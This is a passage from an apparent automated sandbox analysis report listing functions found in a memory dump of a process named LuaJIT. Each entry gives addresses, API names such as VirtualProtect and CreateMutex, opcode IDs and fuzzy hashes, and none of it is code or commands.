                                                      • Instruction Fuzzy Hash: 62B1FA32608A858AD770DB19E48076AB7A0F7DAB98F804135EB9D83B5DDF78D551CF00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1E14C00 Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: _free_nolock
                                                      • String ID:
                                                      • API String ID: 2882679554-0
                                                      • Opcode ID: b3af2ff0c18311ab22d1fc21a707ae1a8690425f7f867d5984d1b9b90b111ee8
                                                      • Instruction ID: af8b300963f42ed4ef180fdbade0807fa92476325ac158f06f557fe3352d956e
                                                      • Opcode Fuzzy Hash: b3af2ff0c18311ab22d1fc21a707ae1a8690425f7f867d5984d1b9b90b111ee8
                                                      • Instruction Fuzzy Hash: 0D51DC76618B4982DB20DB1AE49012EB7B1F7CAB99F510272EF8D47B68CF7CD4518B10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1EBE7D8 Relevance: 1.6, APIs: 1, Instructions: 104COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 3215553584-0
                                                      • Opcode ID: db93148fabc532a6c34eb6862733ff8622850cb7730be65101fd0d6c6195c713
                                                      • Instruction ID: 4ae3705ea615f6390245adeba876c8ff70d18ce4f84ef0e9bbe5c93637c6f210
                                                      • Opcode Fuzzy Hash: db93148fabc532a6c34eb6862733ff8622850cb7730be65101fd0d6c6195c713
                                                      • Instruction Fuzzy Hash: FE41E93291464297EB54EB1CD68027DB3A0FB66789F840731EB4D87799CFA8F452C760
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1EBE0C0 Relevance: 1.6, APIs: 1, Instructions: 74COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 3215553584-0
                                                      • Opcode ID: 0e89df1cee367fa0f0f46a6ac241d8f662de84c4c6795c4a8f44f9d2dcd22c84
                                                      • Instruction ID: c1c934fa1aecff50dd5c70dabbb4fa95045b3f70cc02c1da5fb1184ddf83d8a8
                                                      • Opcode Fuzzy Hash: 0e89df1cee367fa0f0f46a6ac241d8f662de84c4c6795c4a8f44f9d2dcd22c84
                                                      • Instruction Fuzzy Hash: 0A316532A1864145F701BB5D88813BDA691AFA67AAFD14235FB1D133D6CEFCA4818731
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1EC1698 Relevance: 1.6, APIs: 1, Instructions: 54COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 3215553584-0
                                                      • Opcode ID: 577015f382c4b3755d8f64dd5a887aadd0f37ae10328c7424eed687849d3f455
                                                      • Instruction ID: dd2840160f38a98da5470eae8a04de5b2a578db2a555190a4817585740362f01
                                                      • Opcode Fuzzy Hash: 577015f382c4b3755d8f64dd5a887aadd0f37ae10328c7424eed687849d3f455
                                                      • Instruction Fuzzy Hash: D121B332A18A41C6DB60AF2CD840379B2A1EBA6B99F984234FB5D476D9DF7CD410CB10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1EAAC60 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: HandleModule$AddressFreeLibraryProc
                                                      • String ID:
                                                      • API String ID: 3947729631-0
                                                      • Opcode ID: 1dc9139e11363fa82b7be69403f460f39e9a84a2ce977399372339b1150ab367
                                                      • Instruction ID: a578836f829e761b0d81bbe566b1214c0e472b52c6754ab9efc66a5d3003ed50
                                                      • Opcode Fuzzy Hash: 1dc9139e11363fa82b7be69403f460f39e9a84a2ce977399372339b1150ab367
                                                      • Instruction Fuzzy Hash: 11216D32A247528AFB15AF68C4402AC7AB0EB9570DF984536D74D02B89DF78D484CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1EAB114 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 3215553584-0
                                                      • Opcode ID: 023d0aab57ed6f467ea251b0bc75c069ffa40aacfcbe2261f6c8a82ef05c1b62
                                                      • Instruction ID: 4a4b03f48f754271700a4b891ea5939feec4fda113c24cc1f90abca561120e6b
                                                      • Opcode Fuzzy Hash: 023d0aab57ed6f467ea251b0bc75c069ffa40aacfcbe2261f6c8a82ef05c1b62
                                                      • Instruction Fuzzy Hash: E8117222A2C68181FB51BF5994403BEE690AFA7B8DFD44130EB5C47A8ECFADD5408721
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1EAB3A0 Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 3215553584-0
                                                      • Opcode ID: d80676324fc048e8d4e4a872a728742d6b00377b6fd520cac49514b25728106e
                                                      • Instruction ID: 9f8c2b2f48118ab8817236d034a88077f03593980a05c1b5514eddaa17c57d94
                                                      • Opcode Fuzzy Hash: d80676324fc048e8d4e4a872a728742d6b00377b6fd520cac49514b25728106e
                                                      • Instruction Fuzzy Hash: 7D01A561A1878140EB04FB6B5801079E6D1BFA6FE9F884631EF6D57BDADEBCD4418310
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1EBD534 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7afefbf03386326cba4bd6de125ee669795ec973f90e0913fdea4b7710bc3827
                                                      • Instruction ID: d8de0d99a14fd2e2f293d4de889dd1a49bc9fb452d45e6507f237b4f1a6bbf08
                                                      • Opcode Fuzzy Hash: 7afefbf03386326cba4bd6de125ee669795ec973f90e0913fdea4b7710bc3827
                                                      • Instruction Fuzzy Hash: 8911516291868685E705AF58D4802ADB760FBA675EFD04232F74D462D9CFFCD040C720
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1EAAF18 Relevance: 1.5, APIs: 1, Instructions: 40COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 3215553584-0
                                                      • Opcode ID: c07a60661377560c6146fae524e41e5065d009a8dbb5852721a82c0868e09a53
                                                      • Instruction ID: ce00706bf0c606383bb53665965c2fb33e1b8d78ff3c0e1b075f5613ae753a43
                                                      • Opcode Fuzzy Hash: c07a60661377560c6146fae524e41e5065d009a8dbb5852721a82c0868e09a53
                                                      • Instruction Fuzzy Hash: FA018865E2964241FF58BB6D585137D92945FA777DF940330FB2D462CECDACE4818220
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1EB921C Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(?,?,00000000,00007FF7B1EBAB79,?,?,?,00007FF7B1EAAF01,?,?,?,?,00007FF7B1EC02A3), ref: 00007FF7B1EB9271
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: 4ef4a8a9c81e310ef11842bcd22d7f0a9f6f10a443543fb6a607013a95f03771
                                                      • Instruction ID: e2305fec5c131edd5e1e5e1d914ab3d5ae3d33f307b9fa76a807ece66f65b87c
                                                      • Opcode Fuzzy Hash: 4ef4a8a9c81e310ef11842bcd22d7f0a9f6f10a443543fb6a607013a95f03771
                                                      • Instruction Fuzzy Hash: D1F04494F0D20381FF55B6AD64903B6A6945FABF8AFCC4130EF0E9679DDE9CA4804130
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1DF4600 Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: _fread_nolock_invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 2335118202-0
                                                      • Opcode ID: c3e3381ad94b315d625f28b09079c4e3cf748ea191a82bd28328c692f6333f34
                                                      • Instruction ID: fb0c27c1e96bebf838c4eabf811ab3a403292d7ac0c1b1d2ef8490f953377f86
                                                      • Opcode Fuzzy Hash: c3e3381ad94b315d625f28b09079c4e3cf748ea191a82bd28328c692f6333f34
                                                      • Instruction Fuzzy Hash: FB01D732A08B49C1DB209B19E49035EA7A4FBD9B88F904121EB8D47B69DFBDC250CB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1DE5074 Relevance: 1.5, APIs: 1, Instructions: 30synchronizationCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: CreateMutex
                                                      • String ID:
                                                      • API String ID: 1964310414-0
                                                      • Opcode ID: 5bb28053021b0cd2a62d36c1000829e863951e7d25af3afc8164462e2c0a39a0
                                                      • Instruction ID: 2054eaee684e3d6065ece0b9cf0b2daf510706a250b1579faa0c4a0045d3552b
                                                      • Opcode Fuzzy Hash: 5bb28053021b0cd2a62d36c1000829e863951e7d25af3afc8164462e2c0a39a0
                                                      • Instruction Fuzzy Hash: EE011927204A9485DB05AF3EC4504ACBBA4FB5AF8DB088225DF895736CEF25D545C750
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1EAAF9C Relevance: 1.5, APIs: 1, Instructions: 30COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 3215553584-0
                                                      • Opcode ID: 2ee4ea5e302c4353973c3e6e1fb43efa5bc80fb753a258f7a760c2d1a5460acc
                                                      • Instruction ID: 8decb69a2082e2384ff9605a1545520e093c2b2de6af1c507eb7c6bb2c643945
                                                      • Opcode Fuzzy Hash: 2ee4ea5e302c4353973c3e6e1fb43efa5bc80fb753a258f7a760c2d1a5460acc
                                                      • Instruction Fuzzy Hash: 0DF09021A2C64241EB1CBB6DA4411BD91849FA739DFE44230F719462CACEACE4818220
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1EBA290 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(?,?,?,00007FF7B1EBBC42,?,?,?,00007FF7B1EAA3F4,?,?,?,00007FF7B1EAA3BA,?,?,?,00007FF7B1EAA541), ref: 00007FF7B1EBA2CE
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: 39557c8d86b2f5e8a4514c023374127acd5a2de89d3165a96a82d27ef446aa7c
                                                      • Instruction ID: 762d8209ee4027b5707097f72e31637914d49a9860cff6148495135a6dfaa66f
                                                      • Opcode Fuzzy Hash: 39557c8d86b2f5e8a4514c023374127acd5a2de89d3165a96a82d27ef446aa7c
                                                      • Instruction Fuzzy Hash: BCF05405F0925741FF14B7A9589037691C05FE7BAAFC84330FF2E462CADE9DA4819130
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1E3ADE0 Relevance: 1.5, APIs: 1, Instructions: 17memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • VirtualProtect.KERNELBASE(?,?,?,?,?,?,00007FF7B1E3AF20,?,?,?,?,00007FF7B1E3AABE), ref: 00007FF7B1E3AE07
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID:
                                                      • API String ID: 544645111-0
                                                      • Opcode ID: b234133ac9701a7e180f97e51e021304d3a985ac5e6dee729acabcbe2f3f2af1
                                                      • Instruction ID: 5f844ab023151014d24464504cb8f4c76e523fdaec22e7f08541edfde92e3329
                                                      • Opcode Fuzzy Hash: b234133ac9701a7e180f97e51e021304d3a985ac5e6dee729acabcbe2f3f2af1
                                                      • Instruction Fuzzy Hash: A5E0A57261C68186D720EF15F44021ABBA0F795788F900525FB8843A18CBBDD5948F50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1E3AD30 Relevance: 1.3, APIs: 1, Instructions: 21memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      • Opcode ID: aad2cdb57a82e606b8bf1909aa5a5b1721187632c9fd2cb9b286997d59227066
                                                      • Instruction ID: 49e2187f33146c96ca5f0bd2e61aef8a63b8eb056ef495b3872aa7743e3afcaf
